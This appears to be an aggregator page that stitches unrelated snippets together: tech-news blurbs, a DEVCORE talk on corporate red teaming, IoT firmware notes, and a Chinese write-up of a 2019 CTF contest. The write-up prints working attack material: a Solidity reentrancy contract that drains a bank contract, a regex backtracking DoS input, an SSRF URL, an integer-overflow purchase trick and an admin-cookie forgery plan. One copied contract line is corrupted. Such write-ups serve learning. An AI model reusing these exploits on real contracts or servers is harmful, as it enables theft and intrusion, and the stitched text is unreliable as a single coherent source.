Aggregator

前几天，10月24日，在这个程序员的节日里，腾讯时隔十一年，更新了QQ for Linux。瞬间，各大技术论坛，群聊，关于Linux的新QQ的话题不断。为什么QQ这么多年不更新QQ for Linux?在我看来，Linux用户太少，是它不继续更新的主要原因，维护这么少人用的软件实在是令人提不起动力。

Volunteering with Girls Who Code has been one of the most enriching and edifying experiences of my time here at Akamai. I was chosen to serve as a mentor to one of the high school students, gave the NOCC tour...

In our 2019 edition of the Phishing and Fraud Report, we look at the latest methods and trends attackers are using to exploit the most vulnerable part of your defensive posture: your users.

最近两年ST2-OGNL方面的漏洞已经渐渐淡出大家的视线，但我觉得作为曾经红极一时的经典系列RCE漏洞，对于ST2和OGNL有一个深入的认知对于代码审计和漏洞挖掘者是十分重要的，

前言

「紅隊演練」近年來漸漸開始被大家提及，也開始有一些廠商推出紅隊服務。不過關於在台灣紅隊是怎麼做的就比較少人公開分享，身為第一個在台灣推紅隊演練的公司，我想就根據這兩年多來的實戰經驗，分享為什麼我們要做紅隊、我們面臨到的問題、以及在我們心中認為紅隊成員應該具備的特質。最後再分享我們現階段看到的企業資安問題，期望未來我們也可以透過紅隊演練來幫助企業補足那些問題。

這一篇是我在 DEVCORE CONFERENCE 2019 所分享的主題。研討會事前調查想聽內容時有些朋友希望我們能介紹 DEVCORE 的紅隊，還有運作方式和案例，所以我抽出一些素材整理成這場演講。下面是投影片連結，其中有些內部系統畫面不對外公開，僅在研討會分享敬請見諒。

DEVCORE 紅隊的進化，與下一步 － Shaolin (DEVCORE CONF 2019)

為什麼要紅隊演練？

一言以蔽之，就是我們漸漸體會到：對大企業而言，單純的滲透測試並不是最有效益的。從過去上百次滲透測試經驗中，我們往往能在專案初期的偵查階段，發現企業邊界存在嚴重弱點，進而進入內網繞過層層防禦攻擊主要目標。越是龐大的企業，這種狀況會越明顯，因為他們通常有很多對外的網站、網路設備，每一個都可能是風險，即使主要網站防護很完備，駭客只需要從這麼多目標中找到一個問題，就可以對企業造成傷害。今天就算企業對每個服務都獨立做了一次滲透測試，在真實世界中，還是有可能從第三方服務、廠商供應鏈、社交工程等途徑入侵。所以有可能投注很多資源做測試，結果還是發生資安事件。

於是，我們推出了紅隊演練，希望透過真實的演練幫助企業找到整體架構中脆弱的地方。因此，這個服務關注的是企業整體的安全性，而不再只是單一的網站。

紅隊演練目標通常是一個情境，例如：駭客有沒有辦法取得民眾個資甚至是信用卡卡號？在演練過程中紅隊會無所不用其極的嘗試驗證企業在乎的情境有沒有可能發生。以剛剛的例子來說，我們會想辦法找到一條路徑取得存放這些訊息的資料庫，去驗證有沒有辦法取得個資及卡號。一般來說，卡號部分都會經過加密，因此在拿下資料庫後我們也會嘗試看看有沒有辦法還原這些卡號。有時候除了找到還原的方法，我們甚至會在過程中發現其他路徑可取得卡號，可能是工程師的 debug 資訊會記錄卡號，或是備份檔在 NAS 裡面有完整卡號，這些可能是連資安負責人都不知道的資訊，也是企業評估風險的盲點。

到這邊，紅隊演練的效益就很明顯了，紅隊能協助企業全盤評估潛在的重大風險，不再像過去只是單一面向的測試特定網站。除了找到弱點，紅隊更在乎幫企業驗證入侵的可行性，方便企業評估風險以及擬定防禦策略。最後，紅隊往往也能夠在演練過程當中找出企業風險評估忽略的地方，例如剛剛例子提到的備份 NAS，就可能是沒有列入核心系統但又相當重要的伺服器，這一塊也是 DEVCORE 這幾年來確實幫助到客戶的地方。

DEVCORE 紅隊的編制

基本上，DEVCORE 的紅隊成員都是可以獨當一面的，在執行一般專案時成員間並沒有顯著差異。但在演練範圍比較大的狀況下，就會開始有明顯的分工作業，各組也會專精技能增加團隊效率。目前我們的編制共分為五組：

簡單介紹職責如下：

• Intelligence (偵查)，負責情報偵查，他們會去收集跟目標有關的所有資訊，包括 IP 網段、網站個別使用的技術，甚至是洩漏的帳號密碼。
• Special Force (特攻)，有比較強大的攻擊能力，主要負責打破現況，例如攻下第一個據點、拿下另一個網段、或是主機的提權。
• Regular Army (常規)，負責拿下據點後掃蕩整個戰場，嘗試橫向移動，會盡量多建立幾個據點讓特攻組有更多資源朝任務目標邁進。
• Support (支援)，重要的後勤工作，維持據點的可用性，同時也要觀察記錄整個戰況，最清楚全局戰況。
• Research (研究)，平時研究各種在紅隊中會用到的技術，演練時期碰到具戰略價值的系統，會投入資源開採 0-day。

DEVCORE 紅隊的進化

所謂的進化，就是碰到了問題，想辦法強化並且解決，那我們遇到了哪些問題呢？

如何找到一個突破點？

這是大家最常碰到的問題，萬事起頭難，怎麼樣找到第一個突破點？這個問題在紅隊演練當中難度會更高，因為有規模的企業早已投入資源在資安檢測和防護上，我們要怎麼樣從層層防禦當中找到弱點？要能找到別人找不到的弱點，測試思維和方法一定要跟別人不一樣。於是，我們投入資源在偵查、特攻、研究組：偵查部分研究了不同的偵查方法和來源，並且開發自己的工具讓偵查更有效率；我們的特攻組也不斷強化自己的攻擊能力；最重要的，我們讓研究人員開始針對我們常碰到的目標進行研究，開發紅隊會用到的工具或技巧。

這邊特別想要分享研究組的成果，因為我們會去開採一些基礎設施的 0-day，在負責任的揭露後，會將 1-day 用於演練中，這種模式對國外紅隊來說算是相當少見。為了能幫助到紅隊，研究組平時的研究方向，通常都是找企業外網可以碰到的通用服務，例如郵件伺服器、Jenkins、SSL VPN。我們找的弱點都是以不用認證、可取得伺服器控制權為優先，目前已公開的有：Exim、Jenkins、Palo Alto GlobalProtect、FortiGate、Pulse Secure。這些成果在演練當中都有非常非常高的戰略價值，甚至可以說掌控了這些伺服器幾乎就能間接控制企業的大半。

而這些研究成果，也意外的被國外所注意到：

• PortSwigger 連續兩年年度十大網站攻擊技術評選冠軍 (2017, 2018)
• 連續三年 DEFCON & Black Hat USA 發表 (2017, 2018, 2019)
• 台灣第一個拿到 PWNIE AWARD 獎項：Pwnie for Best Server-Side Bug (年度最佳伺服器漏洞) (2018 入圍, 2019 得獎)

目標上萬台，如何發揮紅「隊」效益？

前面靠了偵查、特攻、研究組的成果取得了進入點。下一個問題，是在我們過去的經驗中，有過多次演練的範圍是上萬台電腦，我們要怎樣做才能發揮團隊作戰的效益呢？會有這個問題是因為數量級，如果範圍只有十個網站很容易找目標，但是當網站變多的時候，就很難標註討論我們要攻擊的目標。或是當大家要同步進度的時候，每個人的進度都很多，很難有個地方分享伺服器資訊，讓其他人能接續任務。

過去我們使用類似 Trello 的系統記錄每台伺服器的狀況，在範圍較小的時候很方便好用，但是當資料量一大就會顯得很難操作。

因此，我們自行開發了系統去解決相關問題。分享一些我們設計系統的必要原則供大家參考：

• 伺服器列表可標籤、排序、全文搜尋，火力集中的伺服器必須要自動在顯眼處，省去額外搜尋時間。
• 要可自動建立主機關係圖，方便團隊討論戰況。
• 儲存結構化資訊而非過去的純字串，例如這台機器開的服務資訊、拿 shell 的方式、已滲透的帳號密碼。方便快速釐清目前進度以及事後分析。
• 建立 shell 主控台，方便成員一鍵取得 shell 操作。

另外還有一個問題，紅隊成員這麼多，戰場又分散，如果想要把我們做過的測試過程記錄下來，不是會很複雜嗎？所以我們另外寫了 plugin 記錄 web 的攻擊流量、以及記錄我們在 shell 下過的指令和伺服器回傳的結果，這些記錄甚至比客戶的 access_log 和 bash_history 還詳細。此外，針對每個目標伺服器，我們也會特別記錄在上面所做過的重要行為，例如：改了什麼設定，新增或刪除了什麼檔案，方便我們還有客戶追蹤。要做這樣的客製化記錄其實是很繁瑣的，對那些習慣於自動化解決事情的駭客更是，但我們就是堅持做好這樣的紀錄，即使客戶沒有要求，我們還是會詳實記錄每個步驟，以備不時之需。

企業有防禦設備或機制？

解決了突破點和多人合作的問題，接下來我們面臨到第三個問題，企業有防護措施！在研討會中我舉了幾個較客製的真實防禦案例，說明我們除了常見的防禦設備外也擁有很多跟防禦機制交手的經驗。我們會研究每種防禦的特性加以繞過或利用，甚至會寫工具去躲避偵測，最近比較經典的是團隊做了在 Windows 伺服器上的 Web shell，它可以做到 WAF 抓不到，防毒軟體抓不到，也不會有 eventlog 記錄，利用這個工具可以無聲無息收集伺服器上我們需要的資料。當然，我們不是無敵的，一些較底層的偵測機制還是會無法繞過。這邊我直接講我們進化到目前的準則：在面對伺服器防禦機制，我們能隱匿的，一定做到絕對的隱匿，無法躲的，就把流程最佳化，縮短做事情的時間，例如控制在五分鐘內提權拿到關鍵資料，就算被別人抓到也沒關係，因為該拿的資料也拿到了。

紅隊成員應具備的特質

要能夠在紅隊演練中有突出成果，我覺得成員特質是滿關鍵的一個點。以下整理了幾個我從我們紅隊夥伴觀察到的特質跟大家分享，如果將來有打算從事紅隊工作，或是企業已經打算開始成立內部紅隊，這些特質可能可以作為一些參考。

想像力

第一個是想像力，為什麼會提這個特質，因為現在資安意識慢慢強化，要靠一招打天下是不太有機會的，尤其是紅隊演練這麼有變化的工作。要有成果一定要巧妙的組合利用或是繞過才有機會。

直接舉個例子，我們在公布 Pulse Secure VPN 的研究細節後，有人在 twitter 上表示那個關鍵用來 RCE 的 argument injection 點之前他有找到，只是無法利用所以官方也沒有修。確實我們找到的地方相同，不過我們靠想像力找到了一個可利用參數並搭配 Perl 的特性串出了 RCE。 另一個例子是 Jenkins 研究裡面的一環，我們在繞過身分認證之後發現有一個功能是在檢查使用者輸入的程式語法正不正確。伺服器怎樣去判斷語法正不正確？最簡單的方法就是直接去編譯看看，可以編譯成功就代表語法正確。所以我們研究了可以在『編譯階段』命令執行的方法，讓伺服器在嘗試判斷語法是否正確的同時執行我們的指令。這個手法過去沒有人提過，算是運用想像力的一個經典案例。

關於想像力，其實還有一個隱藏的前提：基礎功要夠。我一直認為想像力是知識的排列組合，例如剛剛的兩個例子，如果不知道 Perl 語法特性和 Meta-Programming 的知識，再怎麼天馬行空都是不可能成功 RCE 的。有基礎功再加上勇於聯想和嘗試，絕對是一個紅隊大將的必備特質。至於基礎功需要到什麼程度，對我們來說，講到一個漏洞，心中就會同時跳出一個樹狀圖：出現成因是什麼？相關的案例、漏洞、繞過方式都會啵啵啵跳出來，能做到這樣我想就已經是有所小成了。

追新技術

會追新技術這件事情，似乎是資安圈的標配，我們的世界不只有 OWASP TOP 10。更現實的說法是，如果只靠這麼一點知識，在紅隊演練能發揮的效果其實並不大。分享一下我看到成員們的樣子，對於他們來說，看新技術是每天的習慣，如果有資安研討會投影片釋出，會追。新技術裡有興趣的，會動手玩，甚至寫成工具，我們很多內部工具都是這樣默默補強的。還有一點，看新技術最終目的就是要活用，拿新技術解決舊問題，往往有機會發現一些突破方式。例如我們在今年八月 BlackHat 研討會看到了 HTTP Desync 的攻擊方式，回國之後馬上就把這個知識用在當時的專案上，讓我們多了一些攻擊面向！（這個手法挺有趣的，在我們污染伺服器後，隨機一個人瀏覽客戶網頁就會執行我們的 JavaScript，不需要什麼特殊條件，有興趣可以研究一下:p ）

相信…以及堅持

最後一點，我想分享的是：在研究或者測試的過程當中，有時候會花費很多時間卻沒有成果，但是如果你評估是有機會，那就相信自己，花時間做下去吧！ 我們有一個花費一個月的例子，是之前破解 IDA Pro 偽隨機數的研究，這個事件意外在 binary 圈很有名，甚至還有人寫成事件懶人包。這個研究是在探討如果我們沒有安裝密碼，有機會安裝 IDA PRO 嗎？結果最後我們想辦法逆推出了 IDA 密碼產生器的算法，知道偽隨機數使用了哪些字元，和它的正確排序。這件事情的難度已經不只在技術上，而在於要猜出偽隨機數使用的字元集順序，還要同時猜出對方使用的演算法（至少有88種）。而且我們每驗證一種排列組合，就會花半天時間和 100GB 的空間，累積成本滿高的。但我們根據經驗相信這是有機會成功的，並且投注資源堅持下去，最後有了很不錯的成果。

這裡不是在鼓勵一意孤行，而是一種心理素質：是在面臨卡關的時候，有足夠的判斷力，方向錯誤能果斷放棄，如果方向正確要有堅持下去的勇氣。

資安防護趨勢與紅隊的下一步

文章的最後一部分要談的是紅隊演練的未來，也是這篇文章的重點，未來，我們希望可以解決什麼問題？

做為紅隊演練的領導廠商，從 2017 年演練到現在我們進入台灣企業內網的成功率是 100%。我們在超過六成的演練案中拿到 AD 管理權限，這還不含那些不是用 AD 來管理的企業。我們發現進入內網後，通常不會有什麼阻礙，就好像變成內部員工，打了聲招呼就可以進機房。想要提醒大家的是：對頂尖攻擊團隊而言，進入企業內網的難度並不高。如果碰上頂尖的駭客，或是一個 0day，企業準備好了嗎？這就是現階段我們所發現的問題！

在說到抵禦攻擊通常會有三個面向，分別是「預防」、「偵測」和「回應」。一般而言企業在「預防」這部份做的比較完善，對於已知的弱點都有比較高的掌握度。今天普遍的問題在「偵測」和「回應」上，企業能不能發現有人在對你進行攻擊？或是知道被攻擊後有沒有能力即時回應並且根絕源頭？這兩件事情做得相對不好的原因並不是企業沒有投入資源在上面，而是對於企業來說太難驗證，很難有個標準去確定目前的機制有沒有效或是買了設備有沒有作用，就算有藍隊通常也沒有建立完善的應對 SOP，畢竟駭客入侵不會是天天發生的事情。

所以，我們希望企業能從紅隊演練中，訓練對攻擊事件的偵測和反應能力。或是說，紅隊演練的本質就是在真實的演練，透過攻防幫助企業了解自己的弱項。過去台灣的紅隊服務都會強調在找出整個企業的弱點，找出漏洞固然重要，但碰到像我們一樣很常找到 0-day 的組織，有偵測和回應能力才是最後能救你一命的硬技能。換個角度來看，目前世界上最完整的攻擊戰略和技術手法列表是 MITRE ATT&CK Framework，一個對企業有傷害的攻擊行動通常會是很多個攻擊手法所組成的攻擊鏈，而在這個 Framework 中，找到起始弱點這件事情僅佔了整個攻擊鏈不到一成，企業如果能夠投注在其他九成手法的偵測能力上並阻斷其中任一環節，就有機會讓整個攻擊行動失敗而保護到資產。

要說的是，我們紅隊演練除了找出企業漏洞能力頂尖之外，也累積了很豐富的內網滲透經驗及技巧，我們很樂意透過演練協助企業加強真實的偵測和回應能力。漸漸的，未來紅隊會慢慢著重在和藍隊的攻防演練。會強調擬定戰略，讓企業了解自己對哪些攻擊的防禦能力比較弱，進而去改善。未來的紅隊也更需要強調與防禦機制交手的經驗，了解防禦的極限，才有辦法找到設備設定不全或是涵蓋率不足的盲點。

最後我們也有些規劃建議給對資安防禦比較成熟的企業如下，逐步落實可以將資安體質提昇一個層次。（至少從我們的經驗來看，有這些概念的企業都是特別難攻擊達成目標的）

• 如果外網安全已投資多年，開始思考「如果駭客已經在內網」的防禦策略
• 盤點出最不可以被洩漏的重要資料，從這些地方開始奉行 Zero Trust 概念
• 企業內部需要有專職資安人員編制（藍隊）
• 透過與有經驗的紅隊合作，全盤檢視防禦盲點

後記

研討會內容到這邊就結束了。寫在最後的最後，是充滿著感謝。其實無論滲透測試還是紅隊演練，在一開始都不是人人可以接受的，而測試的價值也不是我們說了算。一路走來，漸漸漸漸感受到開始有人相信我們，從早期比較多測試時與工程師和網管人員的對立，到近期越來越多 open mind、就是想找出問題的客戶，是滿大的對比。非常感謝他們的信任，也因為這樣的互信，我們得以節省時間完成更棒的產出。滿樂見台灣資訊產業是這樣正向面對問題，漏洞存在就是存在，不會因為視而不見而真的不見，意識到有問題解決了就好。所以我在演講最後留下這樣一句：『紅隊演練的精髓不是在告訴你有多脆弱，在於真正壞人闖入時你可以獨當一面擋下』，希望越來越多人能正面對待問題，同時也傳遞我們想要做到的價值。

2019 DEVCORE CONF，謝謝過去合作的朋友們參與讓 DEVCORE 紅隊得以進化，希望下一步也能有你，我們明年見 :)

The first part of this blog series discussed about the quality of user experience (QoE) metrics and two strategies that heavily influence the QoE: the bitrate selection...

As the Internet grows, so does energy usage. As a result, all large tech organizations have a responsibility to monitor and improve their impact on the environment. At Akamai, we are well aware of the impact we can have, both...

There are three primary avenues to hack a U.S. election: voter registration, voting machines, and the voters themselves. We’ll dig into each and see which offers the most bang for the buck.

静态分析 1. 拿到固件 2. binwalk 解包（解密） 3. firmwalker 查找关键信息（信息泄露） 4. web 目录下确定开发语言和特征 5. etc、etc_ro 目录下查找 sdk 的特征（ralink） 动态仿真/模拟 1. 单个程序尝试模拟（httpd、goahead），打

In this companion podcast, the 2019 F5 Labs Application Protection Report researchers examine how both apps and threats are changing, and what security practitioners can do to stay ahead of these changes.

适合入门的资料 [伏辰实验室 物联网安全百科][1] [绿盟 智能设备安全分析手册][2] [物联网安全从入门到入坑][3] 环境搭建 [路由器漏洞挖掘测试环境的搭建之问题总结][4] 固件提取&固件分析 http://www.devttys0.com/2011/06/mystery file sy

❤️正义白帽，公益挖洞❤️

序 1 2 当前分数：2350， 总排名：80 / 1904 binary：150 ， general：850 ， math：600 ， web：750

菜是原罪，改变不了的事实 :(

签到

复制本人token，过去粘贴然后提交

信息安全2077

看了下是If-Unmodified-Since头，改一下就行

1 2 curl 202.38.93.241:2077/flag.txt -H "User-agent=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) HEICORE/49.1.2623.213 Safari/537.36" -H "If-Unmodified-Since: Tue, 15 Oct 2077 05:47:08 GMT" -d " " flag{Welc0me_to_competit1on_in_2077} happy lug

dns txt记录 一般ctf里面这种都是查txt记录

毕竟我也在我的域名txt里面放过flag (Doge

1 https://mxtoolbox.com/SuperTool.aspx?action=txt%3a%F0%9F%98%82.hack.ustclug.org&run=toolpage# 1 flag{DN5_C4N_H4VE_em0ji_haha} 宇宙终极问题 42

搜一下就有了

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 $ nc 202.38.93.241 10017 Please input your token: 959:MEYCIQC5ir9sscKL0EsFJknDHKTInhAAka2kE67Ja/uuZRTiFAIhAKye8eFiVjnADQenC4nihInpkAKSsGTWnmIjfvSR9K98 the answer toli fetheuniv ersea nde ver ything the ans wer tol ife the uni ver sean dev ery thin gth ean swer tolifetheuni ver seandeveryth ing the ans wer tol ifetheuniver sea ndeverything Do you know The Answer to the Ultimate Question of Life, The Universe, and Everything? Give me 3 integers, x, y, and z, such that x^3 + y^3 + z^3 = 42 x = -80538738812075974 y = 80435758145817515 z = 12602123297335631 (-80538738812075974) ^ 3 + (80435758145817515) ^ 3 + (12602123297335631) ^ 3 = 42 flag{W0W_you_kn0w_the_Answer_t0_l1f3_Un1v3r5e_&_Everyth1ng_a51ec7fd69} 正则验证器

看题目直接猜是正则回溯陷阱

1 2 3 4 5 6 7 8 $ nc 202.38.93.241 10006 Please input your token: 959:MEYCIQC5ir9sscKL0EsFJknDHKTInhAAka2kE67Ja/uuZRTiFAIhAKye8eFiVjnADQenC4nihInpkAKSsGTWnmIjfvSR9K98 Welcome to the free online Regular Expression Verifier Please enter your RegEx and string and I will match them for you RegEx: (a*)*b String: aaaaaaaaaaaaaaaaaaaaaaas flag{R3g3x_can_D0S_f01fd1fa56} ssrf

看源代码，审计

1 http://202.38.93.241:10020/request?url=http://web1/[email protected]

脑子不够用

我想有个家

下载二进制文件，运行一下

看样子是要chroot，那就先创建他需要的东西吧

1 2 3 4 5 6 mkdir hhhh cd hhhh mkdir Bedroom Kitchen Lavatory Living_room touch Bedroom/Micrrophone cd Bedroom ln -s Microphone Headset

然后写个脚本定期修改文件的时间

1 2 3 4 5 6 In [11]: while True: ...: time.sleep(0.1) ...: with open('Living_Room/Clock', 'w') as f: ...: f.write(datetime.now().strftime('%H:%M:%S')) ...:

因为没有动态库了，系统的sleep不能用了

busybox也有sleep，但是需要/dev/null，懒得去搞，直接用go写一个sleep静态编译丢进去

1 2 3 4 5 6 7 8 9 10 11 12 13 package main import ( "fmt" "time" ) func main() { fmt.Println("sleep now ") time.Sleep(time.Duration(10)*time.Second) fmt.Println("sleep") }

交叉编译

1 2 3 set GOOS=linux set GOARCH=amd64 go build main.go

然后执行

1 chroot . ./IWantHome

需要sleep的时候执行main就行了

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ chroot . ./IWantAHome-linux I just want a home. Please do what I say and I will give you a flag Make sure I am running on Linux(Unix). I want these directories in / : [/Kitchen /Lavatory /Bedroom /Living_Room] Thanks, I find these directories. I hate these directories [/home /root /boot /proc /sys /etc /bin] , Please delete them all! Well done. Now I want a telephone in Bedroom I will write something to /Bedroom/Microphone and read the same thing in /Bedroom/Headset Good, telephone works well. Time is important, I need a clock in living_room I will read Beijing time (eg: '20:15:30') in /Living_Room/Clock Good, the clock works well. It is late, tell me how to sleep 10 seconds in shell > ./main command is:'./main' I slept for 10.004741985s flag{I_am_happy_now} 小巧玲珑的ELF

丢进IDA看一下，F5出来有负数，结合着汇编看吧 ida的f5仅供参考

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 push rbp mov rbp, rsp sub rsp, 70h mov [rbp+var_70], 66h mov [rbp+var_6F], 6Eh mov [rbp+var_6E], 65h mov [rbp+var_6D], 6Bh mov [rbp+var_6C], 83h mov [rbp+var_6B], 4Eh mov [rbp+var_6A], 6Dh mov [rbp+var_69], 74h mov [rbp+var_68], 85h mov [rbp+var_67], 7Ah mov [rbp+var_66], 6Fh mov [rbp+var_65], 57h mov [rbp+var_64], 91h mov [rbp+var_63], 73h mov [rbp+var_62], 90h mov [rbp+var_61], 4Fh mov [rbp+var_60], 8Dh mov [rbp+var_5F], 7Fh mov [rbp+var_5E], 63h mov [rbp+var_5D], 36h mov [rbp+var_5C], 6Ch mov [rbp+var_5B], 6Eh mov [rbp+var_5A], 87h mov [rbp+var_59], 69h mov [rbp+var_58], 163 mov [rbp+var_57], 6Fh mov [rbp+var_56], 58h mov [rbp+var_55], 73h mov [rbp+var_54], 66h mov [rbp+var_53], 56h mov [rbp+var_52], 93h mov [rbp+var_51], 9Fh mov [rbp+var_50], 69h mov [rbp+var_4F], 70h mov [rbp+var_4E], 38h mov [rbp+var_4D], 76h mov [rbp+var_4C], 71h mov [rbp+var_4B], 78h mov [rbp+var_4A], 6Fh mov [rbp+var_49], 63h mov [rbp+var_48], 0C4h mov [rbp+var_47], 82h mov [rbp+var_46], 84h mov [rbp+var_45], 0BEh mov [rbp+var_44], 0BBh mov [rbp+var_43], 0CDh

ida打开，F5

1 2 3 4 5 6 7 8 9 10 11 for ( i = 0; i <= 45; ++i ) { buf[i] += 2 * i; buf[i] ^= i; buf[i] -= i; } for ( j = 0; j <= 45; ++j ) { if ( buf[j] != *(&v0 + j) ) __asm { syscall; LINUX - sys_exit } }

梳理下逻辑，根据输入的字符串做一些变换，如果变换之后的结果等于他预定义的字符串，那么输出correct

两种方式去验证，可以爆破flag或者根据验证的内容倒推

1 2 3 4 5 6 7 8 9 10 11 flag = [None for i in range(46)] l = [0x66,0x6E,0x65,0x6B,0x83,0x4E,0x6D,0x74,0x85,0x7A,0x6F,0x57,0x91,0x73,0x90,0x4F,0x8D,0x7F,0x63,0x36,0x6C,0x6E,0x87,0x69,0x0a3,0x6F,0x58, 0x73,0x66,0x56,0x93,0x9F,0x69,0x70,0x38,0x76,0x71,0x78,0x6F,0x63,0x0C4,0x82,0x84,0x0BE,0x0BB,0x0CD,] for i, c in enumerate(l): flag[i] = c+i flag[i] = flag[i]^i flag[i] = flag[i]-2*i # print(i,c,flag[i]) # print(flag) "".join([chr(abs(i)) for i in flag if not None]) 1 2 'flag{Linux_Syst3m_C4ll_is_4_f4scin4ting_t00ls}'

看其他官方的writeup，可以直接符号执行

1 2 3 4 5 6 import angr proj = angr.Project("tinyELF") simgr = proj.factory.simgr() simgr.explore(find=lambda s: b"correct" in s.posix.dumps(1)) print(simgr.found[0].posix.dumps(0))

执行

1 2 3 # root @ Beijing-debian in ~/lug [14:26:47] $ python3 elf.py b'flag{Linux_Syst3m_C4ll_is_4_f4scin4ting_t00ls}'

试了下，几秒钟出结果，符号执行nb

韭菜

全靠丁大佬carry，真的nb

题目给出了智能合约的算法

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 pragma solidity ^0.4.26; contract JCBank { mapping (address => uint) public balance; mapping (uint => bool) public got_flag; uint128 secret; constructor (uint128 init_secret) public { secret = init_secret; } function deposit() public payable { balance[msg.sender] += msg.value; } function withdraw(uint amount) public { require(balance[msg.sender] >= amount); msg.sender.call.value(amount)(); balance[msg.sender] -= amount; } function get_flag_1(uint128 guess) public view returns(string) { require(guess == secret); bytes memory h = new bytes(32); for (uint i = 0; i < 32; i++) { uint b = (secret >> (4 * i)) & 0xF; if (b < 10) { h[31 - i] = byte(b + 48); } else { h[31 - i] = byte(b + 87); } } return string(abi.encodePacked("flag{", h, "}")); } function get_flag_2(uint user_id) public { require(balance[msg.sender] > 1000000000000 ether); got_flag[user_id] = true; balance[msg.sender] = 0; } }

手写一遍算法 去查看智能合约

1 https://kovan.etherscan.io/address/0xe575c9abd35fa94f1949f7d559056bb66fddeb51#code

点contract

下面有一个Arg[0] 这个就是源代码里面的secret

1 2 3 4 5 6 000000000000000000000000000000000175bddc0da1bd47369c47861f48c8ac -----Encoded View--------------- 1 Constructor Arguments found : Arg [0] : 000000000000000000000000000000000175bddc0da1bd47369c47861f48c8ac

把这个放到flag的生成逻辑里面去

1 2 3 4 5 6 7 secret = 0x000000000000000000000000000000000175bddc0da1bd47369c47861f48c8ac h = [None]*32 for i in range(32): b = (secret>>(4*i))&0xf h[31-i] = b+48 if b<10 else b+87 print("flag:", "".join([chr(i) for i in h])) 1 flag: 0175bddc0da1bd47369c47861f48c8ac 达拉崩吧大冒险

去料理市场买东西的时候，可以输入负数，可以猜测这里没有做处理

可以试试造成溢出

尝试了 -2**60 次方可以正常购买， -2**61 次方则会造成异常

于是修改购买的数量为-2305843009213693952，搞定

1 2 3 4 5 6 7 8 Name: 达拉崩吧斑得贝迪卜多比鲁翁 Money: 4611686018427388000 Attack: 6917529027641082000

然后点攻打恶龙，打败之后点要flag

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 旁白: 进入同步！ 蒙达鲁克硫斯伯古比奇巴勒城门卫: 站住！进门收钱！一人50元，童叟无欺！不进的走开，要进的速速报上姓名！ 我: 我是达拉崩吧斑得贝迪卜多比鲁翁，我从千里之外，前来帮助国王救回公主。 国王: 愁啊，愁啊！爱女米娅莫拉苏娜丹妮谢莉红竟被那恶龙带走了。 国王: 若是有哪位勇士能够打败恶龙，大大滴有赏赐 我: 我达拉崩吧斑得贝迪卜多比鲁翁，愿意跨过山与大海，去会会那恶龙昆图库塔卡提考特苏瓦西拉松。 国王: 好！！若你成功救得公主，我赐你黄金万两。 旁白: 接下来，你想去哪里呢？ 我: 料理大市场 隔壁王大妈: 走过路过不要错过，这里有鲜美香脆可口甘甜现炸童子鸡，有效提升攻击力，现在只要两元钱，两块钱，你买不了吃亏，买不了上当。这位客官，你要来几只啊？ 旁白: 你感觉自己浑身充满了干劲 旁白: 接下来，你想去哪里呢？ 我: 去恶龙洞穴 巨龙昆图库塔卡提考特苏瓦西拉松: 我是恶龙昆图库塔卡提考特苏瓦西拉松 我: 你是昆图库塔卡提考特苏瓦西拉松？ 巨龙昆图库塔卡提考特苏瓦西拉松: 我是恶龙昆图库塔卡提考特苏瓦西拉松!我的攻击力可是64403333，看招 旁白: 砰砰砰！叭叭叭！恭喜你，战胜了巨龙昆图库塔卡提考特苏瓦西拉松！ 国王: 啊！我的勇士达拉崩吧斑得贝迪卜多比鲁翁，你救了我的公主米娅莫拉苏娜丹妮谢莉红！你想要什么奖励？ 我: flag 国王: 好！成全你！ 系统: flag{what_an_amazing_dream} 旁白: 失去同步！

题目的剧情是真的有意思 233333

韭菜第二题

再说一遍，丁大佬nb

The Dao攻击

去https://remix.ethereum.org/#optimize=false&evmVersion=null&version=soljson-v0.4.26+commit.4563c3fc.js写代码，新建一个MyContract，然后点击指定版本的智能合约进行编译

填写JCbank的合约地址，然后部署

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 pragma solidity ^0.4.26; contract JCBank { mapping (address => F) public balance; mapping (uint => bool) public got_flag; uint128 secret; constructor (uint128 init_secret) public { secret = init_secret; } function deposit() public payable { balance[msg.sender] += msg.value; } function withdraw(uint amount) public { require(balance[msg.sender] >= amount); msg.sender.call.value(amount)(); balance[msg.sender] -= amount; } function get_flag_1(uint128 guess) public view returns(string) { require(guess == secret); bytes memory h = new bytes(32); for (uint i = 0; i < 32; i++) { uint b = (secret >> (4 * i)) & 0xF; if (b < 10) { h[31 - i] = byte(b + 48); } else { h[31 - i] = byte(b + 87); } } return string(abi.encodePacked("flag{", h, "}")); } function get_flag_2(uint user_id) public { require(balance[msg.sender] > 1000000000000 ether); got_flag[user_id] = true; balance[msg.sender] = 0; } } contract MyContract { JCBank c; address owner; uint public number; function MyContract(address _c) public payable { c = JCBank(_c); owner = msg.sender; c.deposit.value(msg.value)(); } function() public payable { number++; uint weHave=0.1 ether; c.withdraw(weHave); } function attack() public { c.withdraw(0); } function getmoney() public { owner.transfer(this.balance); } function end() public { uint x = 1076008070892; c.get_flag_2(x); } }

先转账，然后攻击 稍等一会儿运行end

泄露的姜戈

github把代码下载下来，改一下views.py里面的代码，让他返回admin登录时候的cookie，然后用这个cookie登录题目就行了

